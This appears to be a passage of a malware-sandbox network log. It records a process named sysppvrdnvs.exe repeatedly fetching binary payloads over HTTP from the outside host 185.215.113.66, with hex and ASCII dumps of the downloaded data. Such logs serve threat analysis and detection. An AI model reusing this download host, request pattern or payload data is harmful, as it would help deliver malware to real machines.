                                                                                                                                                                                            Data Ascii: NGS!8yjx9"{[&TL,LnD70LnMPBe'LpVJgY]h=Ot(P:jjoF2y:P@b6]uD\i4<Q?_;]!A4A1csa^+dQ!xl6Q8wa7?]T%:H1$j4fk!pFzv?l57.(=cscF{-uE8DQF|8ey3'@<Kq"S-?4s.S2j=eLeYh+[}AM,@gW\Z)ET/|"bWRoj(|A,>?1;>"&;ucy[t`w #cdyysGx_Ch*I]Dey.:FQQC BZn2@X&>UYgDYZ)F!FFeh4VGK>V3#+$,&S.lkIF\Ck$)J_l\",0u!kT}V!YB{}nAL[Xo[+1\m,^bLMDj-g <_8d+-D/k<'dv-Qi`N4W(_"%5q844o4gdxsifcD^]M(A[gB4mwAV@g54]BLr!n*WG,6+uY9U4OP&?vKi>X7Dto=2f
                                                                                                                                                                                            Oct 26, 2024 07:26:38.805828094 CEST212INData Raw: b4 bd ad 62 69 93 e7 43 cf 35 4e 07 3e c2 37 6c 66 f1 c1 c8 10 ff ff ef 5e e4 1e 40 46 f2 4f 47 bb b9 53 b2 17 fe 91 80 48 a4 a5 9e 88 5e b0 09 b2 f7 1a 05 c1 ae 77 a6 1a 01 ba f2 27 90 fd 83 00 22 7e ab d7 16 d7 69 b8 9a d6 11 59 f5 10 ed 6f d3
                                                                                                                                                                                            Data Ascii: biC5N>7lf^@FOGSH^w'"~iYoT:1<~!HhQ:P^(K3: yXM^gQD55!HF?}'+Wxrp8U_HK\UxQ
                                                                                                                                                                                            Oct 26, 2024 07:26:38.805849075 CEST1236INData Raw: 83 e4 d1 90 29 7c aa 52 61 69 3e 26 79 cf e3 2b a4 eb a0 86 89 ee 8f 0a 65 18 75 20 96 42 1b 55 48 d4 6a a3 7b 79 30 ed be 6d a7 6c 87 55 ef 22 c3 f5 94 c8 33 a5 83 53 2b c4 c3 b9 90 cf 8a 0c fc cb a5 49 29 7e ad f0 f9 35 44 58 bc b7 23 1f 6f 26
                                                                                                                                                                                            Data Ascii: )|Rai>&y+eu BUHj{y0mlU"3S+I)~5DX#o&n3_$by<DLy/9o-T&ge1c80G~q!&Q{[Y`,OCG"GX! (|h'RTg$^,u1^*qd*cQm3PwL&izY
                                                                                                                                                                                            Oct 26, 2024 07:26:38.805869102 CEST12INData Raw: 02 73 94 7c 14 0e aa f5 e2 b8 40 61
                                                                                                                                                                                            Data Ascii: s|@a
                                                                                                                                                                                            Oct 26, 2024 07:26:38.806361914 CEST1236INData Raw: 24 1a 40 15 ef 62 57 45 85 0a 95 13 1c 99 a6 67 55 34 b3 4c e3 6c c9 df 4c b8 f9 00 9a a1 41 71 99 93 d4 bc b8 1e a9 35 3b 7a a6 23 40 95 fb d1 4d 91 a1 81 38 02 69 ff 64 38 a9 5b 0c b3 79 81 37 2a d8 94 b2 70 12 b6 ca 8b f9 d0 13 b1 08 e6 b5 1a
                                                                                                                                                                                            Data Ascii: $@bWEgU4LlLAq5;z#@M8id8[y7*pZN$S<[Z88Al5r6^9Cko+@bk$>@|#}_XkeTl~Kyyx.d;XbbE7PF-Pedz}F M1
                                                                                                                                                                                            Oct 26, 2024 07:26:38.806397915 CEST1236INData Raw: c7 90 a6 02 38 63 65 e1 35 a7 5c 4a fc a5 a0 41 7c fa ab ec 4d 5a 7a a8 cd f3 9d 2c c0 4a b6 e1 08 2d bf 09 5a 6f 0c 55 f3 a1 ca 08 53 b9 2d 96 2c f5 54 d0 f6 e9 c7 e4 16 91 cf 60 d5 69 da 3f 60 78 a9 71 63 5b 82 90 94 ff 29 32 7e 70 86 b4 8a 0d
                                                                                                                                                                                            Data Ascii: 8ce5\JA|MZz,J-ZoUS-,T`i?`xqc[)2~pHTV 6RCju.,jA E8xY8hLJPi|Kl3KK?OnV& KyL1d6Y0m~ ?LOR9.0Ddr(d
                                                                                                                                                                                            Oct 26, 2024 07:26:38.806420088 CEST1236INData Raw: 28 61 e2 66 9b ed fc 10 0b a8 19 72 63 40 c3 28 e9 51 10 17 b4 30 ee 42 af 06 1c 4a 85 b0 2a ec 47 0f 32 d2 86 d0 1c d3 5e 7b b7 1f 33 07 6b 7b 24 d5 3f 84 69 dd 1a c6 6d 55 ff 95 4d 1d 72 62 64 03 d5 d6 f5 c7 3c 82 9b 0f 82 f1 35 c3 a4 38 ed de
                                                                                                                                                                                            Data Ascii: (afrc@(Q0BJ*G2^{3k{$?imUMrbd<58qqH!]C'L l~FseDp?X76J^\=onk=\HmyYcEJI4B15't=ec*jt'48
                                                                                                                                                                                            Oct 26, 2024 07:26:38.806440115 CEST1236INData Raw: 06 39 50 b7 43 45 3d ac a2 e6 c3 59 fb 1b bf 14 aa fe 64 94 02 43 ff 0c 0f 1c 94 09 2f 2f 8a c0 37 fa 4d 6f 1b d7 c0 3a 5f 5b ed 6e e8 14 55 34 e5 ee f8 a6 e2 26 2d 14 2b 8a f2 54 ef 86 95 b6 07 f3 f1 c8 33 55 2c 25 e8 c8 07 cb 53 9a 8d 14 21 ed
                                                                                                                                                                                            Data Ascii: 9PCE=YdC//7Mo:_[nU4&-+T3U,%S!&C+?0p[}f*5&hj5[@Bq\h6s0s`W}j;Ko7:duXW=m: "iQ`jLrzg(,=-L<z g
                                                                                                                                                                                            Oct 26, 2024 07:26:38.806462049 CEST1236INData Raw: 53 07 71 4d 23 9b d2 8d 26 40 9e 1a 5f 28 96 06 38 ba 40 ee df d5 99 8c 8d 30 3c 9b 11 58 9c 1e fc 9b 48 82 51 d7 75 3f 39 38 b9 8f 1f bf 6b 69 e2 b5 18 cb 72 fd f4 17 1c 26 5b 51 bc 83 ce 8a 4d 72 79 27 36 15 c3 59 c3 b5 a9 55 6b 8b 38 19 47 5b
                                                                                                                                                                                            Data Ascii: SqM#&@_(8@0<XHQu?98kir&[QMry'6YUk8G['kY.@?i3t&MkQ_DWc!=|Wx)ML<`injM's)+]t/Iu#(R<*n0g%hV`GT1"
                                                                                                                                                                                            Oct 26, 2024 07:26:38.806485891 CEST1236INData Raw: 2d 23 b2 08 81 59 c6 d6 03 1f 4d 15 fe 0c 28 01 0b 4e 16 4b 0b 06 ed d9 0b 09 d0 68 b9 45 d5 3b d2 ed 60 27 fe 96 14 31 be dc 93 aa 21 1a 84 fe b3 32 a0 4d ce 7b 15 71 66 96 33 e6 d0 3b 13 f8 83 60 e6 be 5f 38 c4 8b 9c 05 8f 71 a1 fc 4e f8 6e 25
                                                                                                                                                                                            Data Ascii: -#YM(NKhE;`'1!2M{qf3;`_8qNn%&xB+GNoaaR{-zJSn|$^ejjTvZ_k=HdWQI5Ixq[2_ l<13sdQ'cp.wQy+ GOv?
                                                                                                                                                                                            Oct 26, 2024 07:26:38.811398029 CEST1236INData Raw: 5f 8d 3d 09 45 a4 c6 ab e0 23 e0 7c 21 1f 15 bf bb 05 34 10 ed 3c 2d 76 71 00 5b 08 6e 06 e9 41 ed 1e ed 9d 20 b0 6e 7d f7 a1 37 ad 0b a9 db 55 c4 58 47 7c 56 a8 3b 62 77 04 c6 ae 27 e5 91 f1 6a a5 28 52 9f b6 5e c4 23 70 5d c8 4b 5e 1f 38 12 f0
                                                                                                                                                                                            Data Ascii: _=E#|!4<-vq[nA n}7UXG|V;bw'j(R^#p]K^8\<:Y<lvmG3$EM{b)yOunU{$$BOz$,, wIQ9$:D#ckq%%2Tq>CJ>0Tqr%70&c


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            3192.168.2.649856185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:26:43.538521051 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437745094 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:26:44 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 8960
                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "671230ee-2300"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437758923 CEST112INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                            Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437768936 CEST1236INData Raw: 1a 7e 54 ab 8b 45 f0 f6 cd be e1 a1 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a
                                                                                                                                                                                            Data Ascii: ~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437804937 CEST212INData Raw: 18 79 9c 05 4e c4 8e 9a a9 9d c9 5b 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9
                                                                                                                                                                                            Data Ascii: yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437814951 CEST1236INData Raw: fa 5b 97 db f5 94 68 b8 31 5f fe c4 26 82 f5 02 7d e0 2c bd 66 0c 8c cc 0e fc 17 a4 4f c2 8a ae 90 ef 82 6e cf 15 16 d7 c2 4e 95 48 a4 f8 cb 2a 07 12 63 9c 16 c5 9a 3e d2 cc 2f 86 a9 f5 19 e9 95 3a dc 91 e1 49 28 a8 1f 91 c0 2b 5f 61 f6 5b e8 b3
                                                                                                                                                                                            Data Ascii: [h1_&},fOnNH*c>/:I(+_a[;Q|~E|$e|B#IynhJ|k;OTvmk@5Hdtrh S^LO&,8_\KA0VIMF&n;B!]U~1&w\TU
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437841892 CEST1236INData Raw: 57 93 66 9d 53 e2 88 5c 44 17 93 c0 35 91 9b c1 14 4c d0 91 fe aa bd 52 c5 29 72 9d e3 bc 39 de cd a5 b4 b1 58 e9 96 a3 2b 25 d0 11 07 be f8 ed 89 71 be 79 12 82 18 46 ac a6 88 ba 3d 5a 96 af 3f a5 ef 1f e9 da 21 18 33 69 f5 e3 08 b7 9c 52 4d 92
                                                                                                                                                                                            Data Ascii: WfS\D5LR)r9X+%qyF=Z?!3iRMpl/BrlB7-*Yt;|rS{.gdfow%f.tBH{:Ba{%dPL(Q6V>m:p@Nx!I EKJ
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437860966 CEST124INData Raw: 25 69 a2 fd ca 9d e7 bd 81 30 71 7e 33 10 82 8d 90 54 9e bb 7c c3 87 86 d3 12 55 e8 4a 8a 16 82 0c 91 2e b8 d1 1d bb bf dc e7 4c f3 af 8e cf 43 b8 f9 77 31 77 35 65 64 c5 bb ba 51 07 10 a4 ce 44 d9 db b7 71 e2 b5 48 ee fa 05 91 3d 1b c9 c6 91 2e
                                                                                                                                                                                            Data Ascii: %i0q~3T|UJ.LCw1w5edQDqH=.~osXouHePdtnq`Y6G4@4G"
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437921047 CEST1236INData Raw: eb 45 4c 97 ef 2a 1d 2d 9e 44 a8 12 24 dd 16 68 4f 59 12 bf 43 b3 04 4d 19 04 15 bf 01 95 74 9f 14 3b 45 eb f3 d9 62 da 79 9d 16 ba d9 cc d4 f6 3b 74 51 be 85 05 66 0a 71 89 56 7b 23 ef 62 eb 74 a4 a1 98 46 d2 dd b1 ee e3 47 91 89 f2 99 71 dc c6
                                                                                                                                                                                            Data Ascii: EL*-D$hOYCMt;Eby;tQfqV{#btFGqNPs%#@#&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\is
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437948942 CEST1236INData Raw: 44 69 97 04 49 86 d7 b5 59 b2 c1 bc a6 6a 60 69 c7 d9 b8 01 f1 03 06 0d 0c b0 fc aa 40 67 6e cf 94 4b 3d fa 20 12 1c 7b e4 0b 90 7d 37 06 4e 57 b1 53 8d e6 1f 43 0a 22 07 24 10 5a 1b cc 5e 22 4c 64 d0 cf 28 1b 24 a8 fd 5d 0e a7 38 e6 2c 0c cf cb
                                                                                                                                                                                            Data Ascii: DiIYj`i@gnK= {}7NWSC"$Z^"Ld($]8,C"e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t4iUaAIdBJ+:O"
                                                                                                                                                                                            Oct 26, 2024 07:26:44.437961102 CEST1236INData Raw: 35 cc 98 17 45 ee fe 11 2f 11 f1 a7 11 08 7a 36 51 5b b6 a4 0e 15 e5 4f 37 a2 fb 50 32 88 95 be 22 83 f8 5b e1 64 e4 26 6d 00 c2 f9 4d d2 e9 39 54 4c 7c cb b9 79 ca fe 4c 17 8d 93 22 88 09 b9 f5 c4 36 45 30 a8 2c c4 29 da af 3d 55 db 50 b9 bd 72
                                                                                                                                                                                            Data Ascii: 5E/z6Q[O7P2"[d&mM9TL|yL"6E0,)=UPr4;2JaQ{f8-{=i,JHy +9Oq;;=`}>b2[6R+6w|Ajc,{2.dEp,YsEn8W!A2Ou`H0w.z+Vj2W7r5HQ
                                                                                                                                                                                            Oct 26, 2024 07:26:44.443130016 CEST124INData Raw: d0 b8 b8 a4 7a f1 78 a6 de a0 98 fd d5 94 21 bb 17 c0 a8 30 d8 8a ec e3 68 e4 92 ee fd a2 e1 0f 48 24 3b bd 86 96 39 f7 ff d2 03 60 b8 c4 c9 a9 36 ad c1 5c 28 3c f3 9d ac d2 56 a1 15 36 37 e1 45 39 05 02 82 2f aa 3a 6a 3b 9e 3e 7c 57 a3 17 b7 f3
                                                                                                                                                                                            Data Ascii: zx!0hH$;9`6\(<V67E9/:j;>|Wk<cb4Gcap`%SmttII@i


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            4192.168.2.649867185.215.113.66801588C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Oct 26, 2024 07:26:45.461061001 CEST166OUTGET /2 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430039883 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:26:46 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 8960
                                                                                                                                                                                            Last-Modified: Fri, 18 Oct 2024 09:57:02 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "671230ee-2300"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Data Raw: 24 ca 67 ed 72 35 5d b1 46 f1 4d 5b 99 be 6f 06 49 cd 95 a1 a2 11 e9 12 d3 c7 e2 35 85 45 62 e3 98 c2 b5 e8 b3 c3 bf 4c 36 2c 95 69 25 c7 6b 5a 0e 12 d1 d0 d9 38 1e 82 f6 e8 65 50 49 7c 94 06 0f 9b 93 3c f5 9e 69 71 94 f4 be ed 23 e0 11 fd 01 bb d6 0f 4f 40 35 bd 1b 55 7c 2a 7b 60 29 b2 bc d2 5d 82 48 ae a6 d6 e5 8d b7 02 e1 04 86 78 c0 95 2d 88 ea 8d be 64 52 7e 41 f0 7d 22 32 c1 9b e2 e3 14 80 83 e5 cb 20 2b 9c 28 aa 2a ce 52 d2 6d ab 02 db b7 dc 64 f9 a7 cf 21 e1 c6 28 b0 93 0a 24 b9 ec 35 1a 74 e4 b2 b9 a3 cc 46 d5 5d c9 bc 99 ad 3c ab 67 22 d8 c7 97 f2 56 04 28 31 7d 8c 5d 43 1a 88 ae 8d 05 a9 18 e4 b6 73 33 0c 16 37 36 f3 e3 88 97 26 e4 9a b3 ae 0b 49 63 11 8c bf 25 74 ec e5 68 fd 49 ed 80 62 bd f3 a4 fe e9 d1 52 28 e2 bc d0 e5 01 15 9e 7d b8 da 49 45 ae fd 1b 3c fc a8 8a 03 da 5d 9c c4 a1 43 c5 12 ab c3 c4 39 c0 a4 db f5 78 69 7c 06 e7 0e 81 91 f3 84 d2 da f5 d6 2f d6 12 f8 e0 09 3e 79 9d 8a 34 6d e0 ad 0b 33 f0 e1 68 4f 83 05 9c da a4 1f 3b 02 c3 e0 a4 3c 85 7c ab 99 35 b0 2c af 30 dd 74 41 [TRUNCATED]
                                                                                                                                                                                            Data Ascii: $gr5]FM[oI5EbL6,i%kZ8ePI|<iq#O@5U|*{`)]Hx-dR~A}"2 +(*Rmd!($5tF]<g"V(1}]Cs376&Ic%thIbR(}IE<]C9xi|/>y4m3hO;<|5,0tA`JNn;wesqT_:<fb7JH3& f1FGc&k,Jx+c`ws~(sFIT,5\)}-@.4>aue\v=IkB[Q2cLAlTrOUY*mj#uUP>Y{,Tk3h,v)PTK3_++mNP[qeG9f|[-&M~&14w_la/okwM_w^7Rgg%Tv}.Tp;dSuzFPHZIpz50g.`lK\V3tryl2R]?czmvo\ 0oN3aPV=BE\ _^hVf\*n$0qC7BQn.}c/Yd=G-TSx&zwi:,aoouHn8ZxF^=RnUTD9'
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430054903 CEST112INData Raw: 93 57 98 e3 4c ac 64 50 69 d5 5e 60 5a 42 6a 17 d0 32 d7 d9 a3 9b b5 09 7a 01 5c d5 9a f5 b4 51 04 76 c6 6d 7e 0d de 69 d1 63 ff bd c2 b8 2c 86 13 5e 38 49 df c1 51 01 c0 d9 12 0c ba 3d d0 82 60 7b 3d ce 3a 38 e6 8c dc 07 d6 cd 79 a1 7c 5e 57 03
                                                                                                                                                                                            Data Ascii: WLdPi^`ZBj2z\Qvm~ic,^8IQ=`{=:8y|^WaO".m).=WP
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430071115 CEST1236INData Raw: 1a 7e 54 ab 8b 45 f0 f6 cd be e1 a1 4c 42 63 2a 88 24 37 be 0d 52 6c ca 2d 11 74 6a 4f 1c 96 52 71 18 29 06 58 2e ed 84 4a d6 69 35 40 34 36 fa a4 03 08 6e 3d cc 79 d5 da 9b cd e5 49 62 a0 15 b7 25 90 b3 49 fd 19 9c 00 1d 6e be 47 6c 88 53 1f 7a
                                                                                                                                                                                            Data Ascii: ~TELBc*$7Rl-tjORq)X.Ji5@46n=yIb%InGlSz33(:&eGco%bA;0=X^tiIIsnc:F&lU'/xJQHI9xJ :6A@dq"0o3zC4/mqM
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430087090 CEST1236INData Raw: 18 79 9c 05 4e c4 8e 9a a9 9d c9 5b 93 d9 75 84 fb 01 3a 8d e5 b7 91 3a 76 75 6b d3 6c a6 b9 fe a4 2f 47 5e 75 68 33 a0 76 87 6a 1a b3 ec d4 d7 f1 a1 5a c1 ff 30 43 2c 25 b0 ea 1e 1b 51 9d 20 86 8b df 35 f9 6d 0b 1e 79 38 0d bc 65 b9 0b 84 27 d9
                                                                                                                                                                                            Data Ascii: yN[u::vukl/G^uh3vjZ0C,%Q 5my8e'+o{D82.p/{hp'SS/g)WJ4)`&a0oc]Uo(4M'_sG@mxy6("S9%5]9[h1_&},fO
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430103064 CEST424INData Raw: 84 70 54 7d 76 a7 80 23 30 99 b6 5d 7b 26 54 bb 8f 3b 49 5d 85 8d ef 23 d3 03 bf d7 a3 12 7a 16 b2 c0 04 d2 f8 59 ed 93 77 a1 9b 16 eb 38 08 4f 1f f3 41 a0 7b 13 e5 00 b1 6b dd 19 4b ed c5 fb 8c e7 26 47 0f 46 fb 4d 58 09 99 98 14 46 4a 2b a4 8e
                                                                                                                                                                                            Data Ascii: pT}v#0]{&T;I]#zYw8OA{kK&GFMXFJ+I$?r-:Pw_gN/6p"]c{1 NTSgA7|I5Y&hOhAcUz(S7S})!s%F'GWfS\D5LR)r9
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430119038 CEST1236INData Raw: 3a 70 40 9c 99 4e 16 8e 78 88 21 b6 82 49 0b 20 ff d5 15 45 89 e2 a5 c1 4b a0 14 4a d9 0a d6 2a 7b a8 84 73 60 c7 23 fb 10 1a 55 57 72 7c d3 c2 44 66 7f 7e fa d1 0c 59 d3 cc 88 3a 86 c3 3c c2 1b 40 d3 04 d0 c5 91 93 ac 63 a8 3f 2d 47 83 ac ef b6
                                                                                                                                                                                            Data Ascii: :p@Nx!I EKJ*{s`#UWr|Df~Y:<@c?-G+TfV6[_lCQh!UXs{m`/c3KSXkB|"KFJSo_RA~Ka gZ-O#tm?m;}_/j.xUUx`Yo[3
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430135965 CEST1236INData Raw: ea 9d f9 73 f3 dc 25 19 ad f1 23 40 23 26 41 95 d6 f4 47 d6 20 3d bc 4f 50 9f 70 c8 2a ca bb 9f 75 04 ec 4c 78 e9 cd 21 24 bf 41 c9 3c 1f 02 0d 0c 6b 5f 78 8c 6d 80 4f c4 9c 10 d7 a7 16 ed e8 db 31 d2 3e b4 8d 06 f3 89 82 e0 00 18 10 e6 b1 b2 76
                                                                                                                                                                                            Data Ascii: s%#@#&AG =OPp*uLx!$A<k_xmO1>v@O;KbSs YUN7L'A4Ht\isoh-%a~4A7n7C;0PQCgkwNz8NMxAbZYPU4]&^e
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430165052 CEST424INData Raw: 22 0a d7 fd fb 65 13 e7 82 ba f3 30 2b c3 59 1d 8c 11 5f 25 7d e2 e2 9a 61 a8 5c 77 5f af ad 72 90 61 0a a4 3d fa a9 ad 0c e2 cb 4e 2e f3 97 1d 3e 65 ad 91 95 40 06 62 cf cd fa a2 e9 92 23 9a 54 5c df fb 40 41 24 e3 46 4d 16 2e 80 31 0d 21 e9 46
                                                                                                                                                                                            Data Ascii: "e0+Y_%}a\w_ra=N.>e@b#T\@A$FM.1!FWy7JKPh,2W>>{]t4iUaAIdBJ+:O"F7&Vn#Rj*$.z"Wt,qNh"1=3Ib:Y!\fsAF),l;mN|
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430346012 CEST1236INData Raw: 11 19 8e dc c4 c4 a2 20 f4 64 86 38 19 82 82 60 08 e5 aa eb 7d 0d 24 40 81 5b 62 93 20 56 80 3b 09 90 29 57 44 b3 31 d2 b1 29 25 0f 6f 1f 68 58 dd c2 f9 9d 67 20 f2 88 36 a1 77 d5 7b 2c 8d be 78 68 cf 83 6d 4c 97 43 62 1d 2a 92 d4 a4 97 a4 89 e2
                                                                                                                                                                                            Data Ascii: d8`}$@[b V;)WD1)%ohXg 6w{,xhmLCb*Ulh&H&_#>1+OO;yj-1B>u8MdCc%EBCWv$tKm]URY'yG&+@N _"i}b]
                                                                                                                                                                                            Oct 26, 2024 07:26:46.430361032 CEST848INData Raw: e9 92 b4 d8 7f f0 62 68 b8 8a 83 5c 49 be 2e 58 96 c3 6a aa 5b a2 f2 c1 52 29 18 5e e9 cb fa 03 c5 81 b9 98 1b 98 9a 8a 98 9f b2 df 46 b9 32 b1 80 b5 0d dd 92 8f 01 4e dd 7a 69 1b 53 f5 3f f8 7f 72 f5 81 54 2b 2e 5f 73 1f b6 a1 be da 3c e6 df 1e
                                                                                                                                                                                            Data Ascii: bh\I.Xj[R)^F2NziS?rT+._s<mXF{H9xL +!aGSR$>M9<{yq5By/MII$W5VfX# #RT@: IrjJY^O;P)wZ=xAMP]%(1
                                                                                                                                                                                            Oct 26, 2024 07:26:52.766783953 CEST166OUTGET /3 HTTP/1.1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                            Host: 185.215.113.66
                                                                                                                                                                                            Oct 26, 2024 07:26:53.054683924 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                            Date: Sat, 26 Oct 2024 05:26:52 GMT
                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                            Content-Length: 16128
                                                                                                                                                                                            Last-Modified: Wed, 25 Sep 2024 06:10:59 GMT
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            ETag: "66f3a973-3f00"
                                                                                                                                                                                            Accept-Ranges: bytes
